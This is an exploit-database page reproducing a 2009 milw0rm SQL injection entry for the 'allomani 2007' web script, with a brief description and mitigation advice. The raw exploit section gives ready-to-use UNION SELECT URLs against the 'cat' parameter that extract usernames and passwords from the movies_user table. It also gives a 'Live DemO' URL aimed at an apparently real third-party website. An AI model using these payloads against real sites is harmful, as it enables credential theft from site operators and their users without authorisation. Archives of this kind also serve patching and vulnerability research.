allomani 2007 - exploit.company

vendor:

allomani 2007

by:

NeX HackEr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: allomani 2007

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

allomani 2007 <= SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending malicious SQL queries to the vulnerable application. This can be done by manipulating the 'cat' parameter in the 'browse' action of the vulnerable application. An attacker can use the UNION operator to combine the results of two or more SELECT statements into a single result set.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==================

NaMe: allomani 2007  <= SQL Injection Vulnerability
Author : NeX HackEr
Contact: c2l@hotmail.com

==================

Script site : http://allomani.com

==================

ExplOiT:

 UserName

http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT username,2,3 from movies_user

 Password


http://www.xxx.com/path/index.php?action=browse&cat=-1 and 1=0 UNION AlL SELECT password,2,3 from movies_user

 :) 

==================

Live DemO:

http://www.leeen.net/index.php?action=browse&cat=43 and 1=0 UNION AlL SELECT username,2,3 from movies_user



+========================================================+
|                                                                                   
| Greetz.: ~ alMaFiA ~ RmZ AlJnooP ~ GaBsH ~                                          
|               And All Friends!!!!                      
+========================================================+

# milw0rm.com [2009-08-26]